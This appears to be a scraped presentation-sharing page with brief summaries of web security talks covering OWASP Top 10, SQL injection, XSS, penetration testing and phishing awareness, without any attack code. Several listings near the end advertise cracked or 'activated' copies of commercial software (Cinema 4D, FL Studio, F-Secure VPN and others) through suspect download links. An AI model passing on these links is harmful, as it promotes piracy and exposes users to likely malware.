The Open Web Application Security Project is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security
The document discusses vulnerable and outdated components, which are a top security risk. It provides an example of the PyYAML library being vulnerable due to outdated versions allowing code injection attacks. It recommends updating components, removing unused dependencies, and choosing well-maintained dependencies to mitigate issues from vulnerable software.
The document discusses common security threats such as URL spoofing, man-in-the-middle attacks, cross-frame scripting, SQL injection, rainbow table matching, denial of service attacks, cross-site scripting, cross-site request forgery, brute force attacks, and dictionary attacks. For each threat, it describes variations, prevention methods such as input validation, access control, and encryption, and detection techniques like monitoring for anomalous behavior.
API Vulnerabilties and What to Do About ThemEoin Woods
The document provides an agenda and introduction for a presentation on API security. The agenda includes discussing the state of API security, introducing Software Security and OWASP, reviewing the top 10 API security risks, improving software security, and providing a summary. The introduction provides background on the presenter and an overview of Endava, the company he works for. It also lists Endava's global presence and industry expertise.
OWASP Top 10 2021 – Overview and What's New.
OWASP Top 10 is the most successful OWASP Project
It shows ten most critical web application security flaws.
Read the presentation and you will learn each OWASP Top 10 category and recommendations on how to prevent it.
Cross-site scripting (XSS) is an injection attack where malicious scripts are injected into otherwise trusted sites. There are three main types of XSS attacks: reflected XSS occurs via URLs, stored XSS occurs when scripts are stored in a database and delivered to users, and DOM-based XSS modifies the DOM environment. XSS attacks can lead to issues like session hijacking, phishing, and port scanning. Developers can prevent XSS by validating and encoding untrusted data, and using HTTP-only and secure flags for cookies.
This Slide contain information about the SQL injection.
Types of SQL injection and some case study about the SQL injection and some technique so we prevent our system
Session on OWASP Top 10 Vulnerabilities presented by Aarti Bala and Saman Fatima. The session covered the below 4 vulnerabilities -
Injection,
Sensitive Data Exposure
Cross Site Scripting
Insufficient Logging and Monitoring
This document summarizes a presentation on ethical hacking and penetration testing. It includes:
1. An overview of what ethical hacking and penetration testing are, which involves improving security by finding vulnerabilities before hackers do.
2. The issues organizations face from internal and external risks like employees' lack of security awareness or external hackers exploiting weaknesses.
3. The tools and techniques used in penetration testing, including automated vs manual methods, external vs internal testing, and examples like denial of service, social engineering, and Google hacking.
4. Both the benefits of strengthening security and limitations, like testing not being guaranteed to find all vulnerabilities or account for changing technologies.
SQL injection is a code injection technique where malicious SQL statements are inserted into entry fields for execution, allowing attackers to extract or modify data in the database or bypass authentication. Attackers craft SQL statements to determine database schema, extract data, add/modify data, or bypass authentication. SQL injection works by submitting exploit data in a form that is built into a SQL query string sent to the database, which then executes the malicious code and returns any extracted data to the application. Proper data sanitization and using prepared statements can help prevent SQL injection attacks.
The document provides information on vulnerability assessment and penetration testing. It defines vulnerability assessment as a systematic approach to finding security issues in a network or system through manual and automated scanning. Penetration testing involves exploring and exploiting any vulnerabilities that are found to confirm their existence and potential damage. The document outlines the types of testing as blackbox, graybox, and whitebox. It also lists some common tools used for testing like Nmap, ZAP, Nikto, WPScan, and HostedScan. Finally, it provides examples of specific vulnerabilities found and their solutions, such as outdated themes/plugins, backup files being accessible, and SQL injection issues.
Cybersecurity Awareness for employees.pptxAbdullaFatiya3
This document provides an overview of cyber security topics including phishing, ransomware, business email compromise, and personal losses due to cyber crime. It discusses how these attacks occur and provides recommendations on how to protect yourself such as using strong and unique passwords, enabling two-factor authentication, keeping devices updated, being wary of scams, and protecting your digital footprint. The document also outlines specific steps an organization called Illumin8 IT has taken to enhance email security, data protection, and compliance.
The Open Web Application Security Project, is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security.
One of those projects, The OWASP Top Ten, provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
The OWASP team recently released the 2017 revised and updated version of the ten most critical web application security risks and so we’ve created these flash cards for you, your friends, and your colleagues (especially product and engineering :) to test your knowledge and learn more about these important issues.
Company-wide security awareness is a powerful way to improve the overall security of your organization. So adorn your waiting rooms, cubicles, and snack rooms with these flash cards for easy learning and remembrance.
This document discusses patch and vulnerability management. It begins with an agenda that covers why patch management matters, its relationship to risk management and penetration testing, how to implement patch and vulnerability management, establish metrics, plan ahead, and draw conclusions. It then discusses key aspects of patch and vulnerability management including monitoring vulnerabilities, establishing priorities, managing knowledge of vulnerabilities and patches, testing patches, implementing patches, verifying implementation, and improving the process. The goal is to reduce risk by addressing vulnerabilities through a structured patch management program.
Web Application Penetration Testing Introductiongbud7
This document provides an overview of web application penetration testing. It discusses the goals of testing to evaluate security by simulating attacks. The testing process involves gathering information, understanding normal application behavior, and then applying targeted techniques to find weaknesses. The document outlines the reconnaissance, mapping, and active testing phases. It also demonstrates various tools like Burp Suite, W3AF, and SQL injection and cross-site scripting attacks.
The document outlines Prajakta Shinde's seminar on phishing attacks. It defines phishing as attempting to acquire personal information through electronic communication by posing as a trustworthy entity. It discusses common phishing techniques like link manipulation and phone phishing. It also covers types of phishing like deceptive and man-in-the-middle phishing, causes of phishing like user awareness and website vulnerabilities, methods to defend against attacks, and concludes that a combination of user education and security improvements can help reduce phishing.
The document provides an overview of penetration testing basics from a presentation by The Internet Storm Center, SANS Institute, and GIAC Certification Program. It discusses the Internet Storm Center, SANS/GIAC training and certifications, common cyber threats, the methodology for penetration testing, tools used for various stages like reconnaissance, scanning, exploitation, and analysis, and the importance of reporting and mitigation strategies.
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
VAPT (Vulnerability Assessment and Penetration Testing) involves evaluating systems and networks to identify vulnerabilities, configuration issues, and potential routes of unauthorized access. It is recommended for SMEs due to common security issues like phishing and ransomware attacks targeting them. The document outlines the types of VAPT testing, why SMEs need it, example data breaches, and estimated costs of common cyber attacks and security services.
Introduction to Web Application Penetration TestingNetsparker
These slides give an introduction to all the different things and stages that make a complete web application penetration test. It starts from the very basics, including how to define a Scope of Engagement.
These slides are part of the course Introduction to Web Application Security and Penetration Testing with Netsparker, which can be found here: https://www.netsparker.com/blog/web-security/introduction-web-application-penetration-testing/
Owasp Top 10 And Security Flaw Root CausesMarco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
Defend Your Data Now with the MITRE ATT&CK FrameworkTripwire
MITRE is a not-for-profit organization that operates federally-funded research and development centers. Their ATT&CK framework is a useful cybersecurity model illustrating how adversaries behave and explaining the tactics you should use to mitigate risk and improve security. ATT&CK stands for “adversarial tactics, techniques and common knowledge.”
This presentation explores a methodology for pairing proven industry frameworks like MITRE ATT&CK with threat modeling practices to quickly detect and respond to cyber threats. With this approach, industrial organizations can slice their infrastructure into smaller components, making it easier to secure their assets and minimize the attack surface.
Takeaways include how to:
-Make the most out of their threat intelligence feeds
-Report on progress and compliance
-Negotiate trust relationships in the intelligence sharing cycle
-Improve their organization’s overall security posture
What is cyber security. Types of cyber attacks. Web based attacks. System based attacks. Injection attack, Cross-site scripting attack, DNS spoofing, Denial-of-service attack, brute force attack, virus, worms, Trojan horse.
Secure code review is probably the most effective technique to identify security bugs early in the system development lifecycle.
When used together with automated and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. This presentation explain how can we start secure code review effectively.
Penetration testing reporting and methodologyRashad Aliyev
This paper covering information about Penetration testing methodology, standards reporting formats and comparing reports. Explained problem of Cyber Security experts when they making penetration tests. How they doing current presentations.
We will focus our work in penetration testing methodology reporting form and detailed information how to compare result and related work information.
Appsec2013 assurance tagging-robert martindrewz lin
The document discusses engineering software systems to be more secure against attacks. It notes that reducing a system's attack surface alone is not enough, as software and networks are too complex and it is impossible to know all vulnerabilities. It then discusses characteristics of advanced persistent threats, including that the initial attack may go unnoticed and adversaries cannot be fully kept out. Finally, it argues that taking a threat-driven perspective beyond just operational defense can help balance mitigation with detection and response.
supraja technologies material for secure codingSri Latha
The document provides an introduction to the OWASP Top 10 list, which identifies the most critical web application security risks. It lists the top 10 risks as Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging & Monitoring. For each risk, it provides a brief description of the vulnerability, examples, and mitigation strategies. It also includes sections on Injection risks and root causes as well as mitigation strategies.
This document summarizes a presentation on ethical hacking and penetration testing. It includes:
1. An overview of what ethical hacking and penetration testing are, which involves improving security by finding vulnerabilities before hackers do.
2. The issues organizations face from internal and external risks like employees' lack of security awareness or external hackers exploiting weaknesses.
3. The tools and techniques used in penetration testing, including automated vs manual methods, external vs internal testing, and examples like denial of service, social engineering, and Google hacking.
4. Both the benefits of strengthening security and limitations, like testing not being guaranteed to find all vulnerabilities or account for changing technologies.
SQL injection is a code injection technique where malicious SQL statements are inserted into entry fields for execution, allowing attackers to extract or modify data in the database or bypass authentication. Attackers craft SQL statements to determine database schema, extract data, add/modify data, or bypass authentication. SQL injection works by submitting exploit data in a form that is built into a SQL query string sent to the database, which then executes the malicious code and returns any extracted data to the application. Proper data sanitization and using prepared statements can help prevent SQL injection attacks.
The document provides information on vulnerability assessment and penetration testing. It defines vulnerability assessment as a systematic approach to finding security issues in a network or system through manual and automated scanning. Penetration testing involves exploring and exploiting any vulnerabilities that are found to confirm their existence and potential damage. The document outlines the types of testing as blackbox, graybox, and whitebox. It also lists some common tools used for testing like Nmap, ZAP, Nikto, WPScan, and HostedScan. Finally, it provides examples of specific vulnerabilities found and their solutions, such as outdated themes/plugins, backup files being accessible, and SQL injection issues.
Cybersecurity Awareness for employees.pptxAbdullaFatiya3
This document provides an overview of cyber security topics including phishing, ransomware, business email compromise, and personal losses due to cyber crime. It discusses how these attacks occur and provides recommendations on how to protect yourself such as using strong and unique passwords, enabling two-factor authentication, keeping devices updated, being wary of scams, and protecting your digital footprint. The document also outlines specific steps an organization called Illumin8 IT has taken to enhance email security, data protection, and compliance.
The Open Web Application Security Project, is an online community that produces freely-available articles, methodologies, documentation, tools, and technologies in the field of web application security.
One of those projects, The OWASP Top Ten, provides a powerful awareness document for web application security. The OWASP Top Ten represents a broad consensus about what the most critical web application security flaws are.
The OWASP team recently released the 2017 revised and updated version of the ten most critical web application security risks and so we’ve created these flash cards for you, your friends, and your colleagues (especially product and engineering :) to test your knowledge and learn more about these important issues.
Company-wide security awareness is a powerful way to improve the overall security of your organization. So adorn your waiting rooms, cubicles, and snack rooms with these flash cards for easy learning and remembrance.
This document discusses patch and vulnerability management. It begins with an agenda that covers why patch management matters, its relationship to risk management and penetration testing, how to implement patch and vulnerability management, establish metrics, plan ahead, and draw conclusions. It then discusses key aspects of patch and vulnerability management including monitoring vulnerabilities, establishing priorities, managing knowledge of vulnerabilities and patches, testing patches, implementing patches, verifying implementation, and improving the process. The goal is to reduce risk by addressing vulnerabilities through a structured patch management program.
Web Application Penetration Testing Introductiongbud7
This document provides an overview of web application penetration testing. It discusses the goals of testing to evaluate security by simulating attacks. The testing process involves gathering information, understanding normal application behavior, and then applying targeted techniques to find weaknesses. The document outlines the reconnaissance, mapping, and active testing phases. It also demonstrates various tools like Burp Suite, W3AF, and SQL injection and cross-site scripting attacks.
The document outlines Prajakta Shinde's seminar on phishing attacks. It defines phishing as attempting to acquire personal information through electronic communication by posing as a trustworthy entity. It discusses common phishing techniques like link manipulation and phone phishing. It also covers types of phishing like deceptive and man-in-the-middle phishing, causes of phishing like user awareness and website vulnerabilities, methods to defend against attacks, and concludes that a combination of user education and security improvements can help reduce phishing.
The document provides an overview of penetration testing basics from a presentation by The Internet Storm Center, SANS Institute, and GIAC Certification Program. It discusses the Internet Storm Center, SANS/GIAC training and certifications, common cyber threats, the methodology for penetration testing, tools used for various stages like reconnaissance, scanning, exploitation, and analysis, and the importance of reporting and mitigation strategies.
Application misconfiguration attacks exploit weaknesses in web applications caused by configuration mistakes. These mistakes include using default passwords and privileges or revealing too much debugging information. Misconfiguration can have minor effects but can also cause major issues like data loss or full system compromise. It is a common problem caused by factors like human error and complex application interfaces. Proper security practices like regular reviews and testing can help detect and prevent misconfiguration vulnerabilities.
VAPT (Vulnerability Assessment and Penetration Testing) involves evaluating systems and networks to identify vulnerabilities, configuration issues, and potential routes of unauthorized access. It is recommended for SMEs due to common security issues like phishing and ransomware attacks targeting them. The document outlines the types of VAPT testing, why SMEs need it, example data breaches, and estimated costs of common cyber attacks and security services.
Introduction to Web Application Penetration TestingNetsparker
These slides give an introduction to all the different things and stages that make a complete web application penetration test. It starts from the very basics, including how to define a Scope of Engagement.
These slides are part of the course Introduction to Web Application Security and Penetration Testing with Netsparker, which can be found here: https://www.netsparker.com/blog/web-security/introduction-web-application-penetration-testing/
Owasp Top 10 And Security Flaw Root CausesMarco Morana
The document discusses root causes of common web application security flaws and vulnerabilities known as the OWASP Top 10. It provides an overview of tactical and strategic approaches to address these issues, including threat modeling, mapping vulnerabilities to application architecture, and implementing security by design principles. Specific guidelines are given for securely handling authentication, authorization, cryptography, sessions, input validation, errors and logging.
Defend Your Data Now with the MITRE ATT&CK FrameworkTripwire
MITRE is a not-for-profit organization that operates federally-funded research and development centers. Their ATT&CK framework is a useful cybersecurity model illustrating how adversaries behave and explaining the tactics you should use to mitigate risk and improve security. ATT&CK stands for “adversarial tactics, techniques and common knowledge.”
This presentation explores a methodology for pairing proven industry frameworks like MITRE ATT&CK with threat modeling practices to quickly detect and respond to cyber threats. With this approach, industrial organizations can slice their infrastructure into smaller components, making it easier to secure their assets and minimize the attack surface.
Takeaways include how to:
-Make the most out of their threat intelligence feeds
-Report on progress and compliance
-Negotiate trust relationships in the intelligence sharing cycle
-Improve their organization’s overall security posture
What is cyber security. Types of cyber attacks. Web based attacks. System based attacks. Injection attack, Cross-site scripting attack, DNS spoofing, Denial-of-service attack, brute force attack, virus, worms, Trojan horse.
Secure code review is probably the most effective technique to identify security bugs early in the system development lifecycle.
When used together with automated and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. This presentation explain how can we start secure code review effectively.
Penetration testing reporting and methodologyRashad Aliyev
This paper covering information about Penetration testing methodology, standards reporting formats and comparing reports. Explained problem of Cyber Security experts when they making penetration tests. How they doing current presentations.
We will focus our work in penetration testing methodology reporting form and detailed information how to compare result and related work information.
Appsec2013 assurance tagging-robert martindrewz lin
The document discusses engineering software systems to be more secure against attacks. It notes that reducing a system's attack surface alone is not enough, as software and networks are too complex and it is impossible to know all vulnerabilities. It then discusses characteristics of advanced persistent threats, including that the initial attack may go unnoticed and adversaries cannot be fully kept out. Finally, it argues that taking a threat-driven perspective beyond just operational defense can help balance mitigation with detection and response.
supraja technologies material for secure codingSri Latha
The document provides an introduction to the OWASP Top 10 list, which identifies the most critical web application security risks. It lists the top 10 risks as Injection, Broken Authentication, Sensitive Data Exposure, XML External Entities (XXE), Broken Access Control, Security Misconfiguration, Cross-Site Scripting (XSS), Insecure Deserialization, Using Components with Known Vulnerabilities, and Insufficient Logging & Monitoring. For each risk, it provides a brief description of the vulnerability, examples, and mitigation strategies. It also includes sections on Injection risks and root causes as well as mitigation strategies.
Security testing is the process of identifying vulnerabilities in a system to protect data and ensure intended functionality. It involves testing confidentiality, integrity, authentication, availability, authorization, and non-repudiation. The security testing process includes planning, vulnerability scanning, assessment, penetration testing, and reporting. Types of security testing include static application, dynamic application, and penetration testing. The OWASP Top 10 list identifies the most critical web application security risks.
This document discusses secure web application development and preventing common vulnerabilities. It begins with an introduction on why web applications are often vulnerable and the importance of secure development. It then provides details on secure development lifecycles and practices, describes top vulnerabilities like injection flaws and cross-site scripting, and provides guidance on how to prevent each vulnerability through practices like input validation, output encoding, and access controls. The goal is to help developers understand security risks and how to build more robust applications through secure coding and threat modeling.
The document summarizes the OWASP Top 10 security risks for web applications. It provides details on each risk such as the types of SQL injection attacks and how to prevent injection flaws. For each risk, it discusses how to determine if an application is vulnerable and recommendations for prevention, including input validation, authentication, authorization, encryption, and keeping components updated. The top risks are injection, broken authentication, XSS, insecure object references, security misconfiguration, sensitive data exposure, missing access controls, CSRF, use of vulnerable components, and unvalidated redirects.
For Business's Sake, Let's focus on AppSecLalit Kale
Slide-Deck for session on Application Security at Limerick DotNet-Azure User Group on 15th Feb, 2018
Event URL: https://www.meetup.com/Limerick-DotNet/events/hzctdpyxdbtb/
The document outlines the OWASP Top 10 application security risks for 2017. It discusses the top 10 risks which are injection, broken authentication, sensitive data exposure, XML external entities, broken access control, security misconfiguration, cross-site scripting, insecure deserialization, use of vulnerable components, and insufficient logging and monitoring. It provides details on each risk such as examples and how attackers can exploit them. The document also discusses OWASP's goal of raising awareness of application security needs and best practices for developers and organizations.
OWASP Top 10 And Insecure Software Root CausesMarco Morana
This document discusses common web application vulnerabilities and their root causes. It provides an overview of the OWASP Top 10 list of vulnerabilities, describing each vulnerability type, how attackers exploit them, examples of insecure code that enables the vulnerabilities, and recommendations for secure coding practices to prevent the vulnerabilities. Specific vulnerabilities covered include cross-site scripting, SQL injection, malicious file execution, insecure direct object references, cross-site request forgery, and information leakage from error handling. The document emphasizes the importance of following secure coding standards and input validation to prevent vulnerabilities.
Application Security Vulnerabilities: OWASP Top 10 -2007Vaibhav Gupta
General concepts of web application security vulnerabilities primarily based on OWASP Top 10 list-2007(I know its too old :-))
I, along with Sandeep and Vishal, presented on this at IIIT-Delhi college in April, 2014
WEB APPLICATION VULNERABILITIES: DAWN, DETECTION, EXPLOITATION AND DEFENSEAjith Kp
The document discusses vulnerabilities in web applications. It begins by introducing common vulnerabilities like injection flaws, file inclusion, cross-site scripting, etc. It then provides statistics on the most prevalent vulnerabilities according to security vendors, with cross-site scripting and SQL injection being the top two. The document focuses on injection vulnerabilities like remote code execution (RCE) and SQL injection, explaining how they work, how to detect and exploit them, and defenses against them. RCE allows executing commands on remote machines while SQL injection allows executing SQL queries to leak database information. Both are dangerous and easy to exploit due to careless coding practices.
The goal of the Top 10 project is to raise awareness about application security by identifying some of the most critical risks facing organizations. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. This release of the OWASP Top 10 marks this project’s eighth year of raising awareness of the importance of application security risks. The OWASP Top 10 was first released in 2003, minor updates were made in 2004 and 2007, and this is the 2010 release.
Navigating the Intersection: IAM and OWASP in the Cybersecurity Landscape (Id...David Brossard
Join us on a captivating exploration of the intricate relationship between Identity & Access Management (IAM) and the Open Worldwide Application Security Project (OWASP) in the realm of cybersecurity. Discover the convergence of IAM, a discipline applicable to both IT and the physical world, with OWASP, a community dedicated to advancing web application security. Specifically, we'll explore the intersection of IAM and OWASP through the lens of OWASP Top Ten's key categories, including: A01:2021-Broken Access Control A03:2021-Injection A04:2021-Insecure Design A07:2021-Identification and Authentication Failures A09:2021-Security Logging and Monitoring Failures For each category, we'll navigate the implications for IAM, understanding how IAM frameworks and processes can address or mitigate the risks outlined by OWASP. From tackling broken access control through identity verification to addressing injection vulnerabilities with a Zero Trust mindset, this session provides actionable insights for cybersecurity professionals and application developers alike. Our journey concludes with a comprehensive view of how a robust implementation of IAM frameworks and adherence to best practices can fortify web applications against security threats. Learn from real-world examples, discover collaborative strategies between application developers and IAM teams, and gain a deeper understanding of the standards and frameworks that underpin secure application development.
This document discusses application security testing and provides recommendations for a comprehensive testing plan. It begins by outlining common application security vulnerabilities like injection flaws, cross-site scripting, and sensitive data exposure. It then recommends using tools like vulnerability scanning, threat modeling, code analysis, and penetration testing to test for vulnerabilities. The document concludes by describing how to test for issues in specific areas like authentication, authorization, data validation, and payment processing.
Sergey Kochergan - OWASP Top 10 Web Application Vulnerabilities Braindev Kyiv
Sergey Kochergan is QA Engineer at Luxoft with extensive experience in software engineering and security field. As an independent consultant, he has provided strategic expertise to business clients with frameworks for SCADA security policy, organazied hackatons and ctf events. Sergey was involved into R&D projects of System Design for SDR communication hardware, network forensics with IDS.
In this lecture Sergey will tell the audience about Security in general, will make overview of nowadays Web Testing Environment and also will present his vision of Risk Rating Methodology and Vulnerability Patterns.
For our next events join us:
http://www.meetup.com/Kyiv-Dev-Meetup-SmartMonday/
https://www.facebook.com/braindevkyiv
As long as code and data cannot be distinguished by machines, Injection attacks will prevail. Injection flaws are very prevalent, particularly in legacy code. Injection flaws occur when an application sends untrusted data to an interpreter. This talk will focus on different injection flaws, challenges associated with it and possible ways to mitigate it.
The document provides guidelines for secure coding. It discusses the evolution of software markets and increased security threats. Common web attacks like injection, broken authentication, and sensitive data exposure are explained. The OWASP Top 10 list of vulnerabilities is reviewed. The document emphasizes the importance of secure coding practices like input validation, output encoding, and using components with no known vulnerabilities. Following a secure coding lifestyle can help developers write more secure code and protect against attacks.
The document discusses cyber security topics like web security, Zed Attack Proxy (ZAP), SQL injection, Damn Vulnerable Web Application (DVWA), and WebGoat. It provides an overview of these topics, including what ZAP is used for, how to configure it, and how to use its features like intercepting traffic, scanning, and reporting. It also discusses the Open Web Application Security Project (OWASP) and some of the top 10 vulnerabilities like SQL injection.
⭕️➡️ FOR DOWNLOAD LINK : http://drfiles.net/ ⬅️⭕️
Maxon Cinema 4D 2025 is the latest version of the Maxon's 3D software, released in September 2024, and it builds upon previous versions with new tools for procedural modeling and animation, as well as enhancements to particle, Pyro, and rigid body simulations. CG Channel also mentions that Cinema 4D 2025.2, released in April 2025, focuses on spline tools and unified simulation enhancements.
Key improvements and features of Cinema 4D 2025 include:
Procedural Modeling: New tools and workflows for creating models procedurally, including fabric weave and constellation generators.
Procedural Animation: Field Driver tag for procedural animation.
Simulation Enhancements: Improved particle, Pyro, and rigid body simulations.
Spline Tools: Enhanced spline tools for motion graphics and animation, including spline modifiers from Rocket Lasso now included for all subscribers.
Unified Simulation & Particles: Refined physics-based effects and improved particle systems.
Boolean System: Modernized boolean system for precise 3D modeling.
Particle Node Modifier: New particle node modifier for creating particle scenes.
Learning Panel: Intuitive learning panel for new users.
Redshift Integration: Maxon now includes access to the full power of Redshift rendering for all new subscriptions.
In essence, Cinema 4D 2025 is a major update that provides artists with more powerful tools and workflows for creating 3D content, particularly in the fields of motion graphics, VFX, and visualization.
Download YouTube By Click 2025 Free Full Activatedsaniamalik72555
Copy & Past Link 👉👉
https://dr-up-community.info/
"YouTube by Click" likely refers to the ByClick Downloader software, a video downloading and conversion tool, specifically designed to download content from YouTube and other video platforms. It allows users to download YouTube videos for offline viewing and to convert them to different formats.
FL Studio Producer Edition Crack 2025 Full Versiontahirabibi60507
Copy & Past Link 👉👉
http://drfiles.net/
FL Studio is a Digital Audio Workstation (DAW) software used for music production. It's developed by the Belgian company Image-Line. FL Studio allows users to create and edit music using a graphical user interface with a pattern-based music sequencer.
Join Ajay Sarpal and Miray Vu to learn about key Marketo Engage enhancements. Discover improved in-app Salesforce CRM connector statistics for easy monitoring of sync health and throughput. Explore new Salesforce CRM Synch Dashboards providing up-to-date insights into weekly activity usage, thresholds, and limits with drill-down capabilities. Learn about proactive notifications for both Salesforce CRM sync and product usage overages. Get an update on improved Salesforce CRM synch scale and reliability coming in Q2 2025.
Key Takeaways:
Improved Salesforce CRM User Experience: Learn how self-service visibility enhances satisfaction.
Utilize Salesforce CRM Synch Dashboards: Explore real-time weekly activity data.
Monitor Performance Against Limits: See threshold limits for each product level.
Get Usage Over-Limit Alerts: Receive notifications for exceeding thresholds.
Learn About Improved Salesforce CRM Scale: Understand upcoming cloud-based incremental sync.
Exceptional Behaviors: How Frequently Are They Tested? (AST 2025)Andre Hora
Exceptions allow developers to handle error cases expected to occur infrequently. Ideally, good test suites should test both normal and exceptional behaviors to catch more bugs and avoid regressions. While current research analyzes exceptions that propagate to tests, it does not explore other exceptions that do not reach the tests. In this paper, we provide an empirical study to explore how frequently exceptional behaviors are tested in real-world systems. We consider both exceptions that propagate to tests and the ones that do not reach the tests. For this purpose, we run an instrumented version of test suites, monitor their execution, and collect information about the exceptions raised at runtime. We analyze the test suites of 25 Python systems, covering 5,372 executed methods, 17.9M calls, and 1.4M raised exceptions. We find that 21.4% of the executed methods do raise exceptions at runtime. In methods that raise exceptions, on the median, 1 in 10 calls exercise exceptional behaviors. Close to 80% of the methods that raise exceptions do so infrequently, but about 20% raise exceptions more frequently. Finally, we provide implications for researchers and practitioners. We suggest developing novel tools to support exercising exceptional behaviors and refactoring expensive try/except blocks. We also call attention to the fact that exception-raising behaviors are not necessarily “abnormal” or rare.
TestMigrationsInPy: A Dataset of Test Migrations from Unittest to Pytest (MSR...Andre Hora
Unittest and pytest are the most popular testing frameworks in Python. Overall, pytest provides some advantages, including simpler assertion, reuse of fixtures, and interoperability. Due to such benefits, multiple projects in the Python ecosystem have migrated from unittest to pytest. To facilitate the migration, pytest can also run unittest tests, thus, the migration can happen gradually over time. However, the migration can be timeconsuming and take a long time to conclude. In this context, projects would benefit from automated solutions to support the migration process. In this paper, we propose TestMigrationsInPy, a dataset of test migrations from unittest to pytest. TestMigrationsInPy contains 923 real-world migrations performed by developers. Future research proposing novel solutions to migrate frameworks in Python can rely on TestMigrationsInPy as a ground truth. Moreover, as TestMigrationsInPy includes information about the migration type (e.g., changes in assertions or fixtures), our dataset enables novel solutions to be verified effectively, for instance, from simpler assertion migrations to more complex fixture migrations. TestMigrationsInPy is publicly available at: https://github.com/altinoalvesjunior/TestMigrationsInPy.
Get & Download Wondershare Filmora Crack Latest [2025]saniaaftab72555
Copy & Past Link 👉👉
https://dr-up-community.info/
Wondershare Filmora is a video editing software and app designed for both beginners and experienced users. It's known for its user-friendly interface, drag-and-drop functionality, and a wide range of tools and features for creating and editing videos. Filmora is available on Windows, macOS, iOS (iPhone/iPad), and Android platforms.
AgentExchange is Salesforce’s latest innovation, expanding upon the foundation of AppExchange by offering a centralized marketplace for AI-powered digital labor. Designed for Agentblazers, developers, and Salesforce admins, this platform enables the rapid development and deployment of AI agents across industries.
Email: [email protected]
Phone: +1(630) 349 2411
Website: https://www.fexle.com/blogs/agentexchange-an-ultimate-guide-for-salesforce-consultants-businesses/?utm_source=slideshare&utm_medium=pptNg
F-Secure Freedome VPN 2025 Crack Plus Activation New Versionsaimabibi60507
Copy & Past Link 👉👉
https://dr-up-community.info/
F-Secure Freedome VPN is a virtual private network service developed by F-Secure, a Finnish cybersecurity company. It offers features such as Wi-Fi protection, IP address masking, browsing protection, and a kill switch to enhance online privacy and security .
Scaling GraphRAG: Efficient Knowledge Retrieval for Enterprise AIdanshalev
If we were building a GenAI stack today, we'd start with one question: Can your retrieval system handle multi-hop logic?
Trick question, b/c most can’t. They treat retrieval as nearest-neighbor search.
Today, we discussed scaling #GraphRAG at AWS DevOps Day, and the takeaway is clear: VectorRAG is naive, lacks domain awareness, and can’t handle full dataset retrieval.
GraphRAG builds a knowledge graph from source documents, allowing for a deeper understanding of the data + higher accuracy.
Microsoft AI Nonprofit Use Cases and Live Demo_2025.04.30.pdfTechSoup
In this webinar we will dive into the essentials of generative AI, address key AI concerns, and demonstrate how nonprofits can benefit from using Microsoft’s AI assistant, Copilot, to achieve their goals.
This event series to help nonprofits obtain Copilot skills is made possible by generous support from Microsoft.
What You’ll Learn in Part 2:
Explore real-world nonprofit use cases and success stories.
Participate in live demonstrations and a hands-on activity to see how you can use Microsoft 365 Copilot in your own work!
Meet the Agents: How AI Is Learning to Think, Plan, and CollaborateMaxim Salnikov
Imagine if apps could think, plan, and team up like humans. Welcome to the world of AI agents and agentic user interfaces (UI)! In this session, we'll explore how AI agents make decisions, collaborate with each other, and create more natural and powerful experiences for users.
Douwan Crack 2025 new verson+ License codeaneelaramzan63
Copy & Paste On Google >>> https://dr-up-community.info/
Douwan Preactivated Crack Douwan Crack Free Download. Douwan is a comprehensive software solution designed for data management and analysis.
Designing AI-Powered APIs on Azure: Best Practices& ConsiderationsDinusha Kumarasiri
AI is transforming APIs, enabling smarter automation, enhanced decision-making, and seamless integrations. This presentation explores key design principles for AI-infused APIs on Azure, covering performance optimization, security best practices, scalability strategies, and responsible AI governance. Learn how to leverage Azure API Management, machine learning models, and cloud-native architectures to build robust, efficient, and intelligent API solutions
Not So Common Memory Leaks in Java WebinarTier1 app
This SlideShare presentation is from our May webinar, “Not So Common Memory Leaks & How to Fix Them?”, where we explored lesser-known memory leak patterns in Java applications. Unlike typical leaks, subtle issues such as thread local misuse, inner class references, uncached collections, and misbehaving frameworks often go undetected and gradually degrade performance. This deck provides in-depth insights into identifying these hidden leaks using advanced heap analysis and profiling techniques, along with real-world case studies and practical solutions. Ideal for developers and performance engineers aiming to deepen their understanding of Java memory management and improve application stability.
What Do Contribution Guidelines Say About Software Testing? (MSR 2025)Andre Hora
Software testing plays a crucial role in the contribution process of open-source projects. For example, contributions introducing new features are expected to include tests, and contributions with tests are more likely to be accepted. Although most real-world projects require contributors to write tests, the specific testing practices communicated to contributors remain unclear. In this paper, we present an empirical study to understand better how software testing is approached in contribution guidelines. We analyze the guidelines of 200 Python and JavaScript open-source software projects. We find that 78% of the projects include some form of test documentation for contributors. Test documentation is located in multiple sources, including CONTRIBUTING files (58%), external documentation (24%), and README files (8%). Furthermore, test documentation commonly explains how to run tests (83.5%), but less often provides guidance on how to write tests (37%). It frequently covers unit tests (71%), but rarely addresses integration (20.5%) and end-to-end tests (15.5%). Other key testing aspects are also less frequently discussed: test coverage (25.5%) and mocking (9.5%). We conclude by discussing implications and future research.
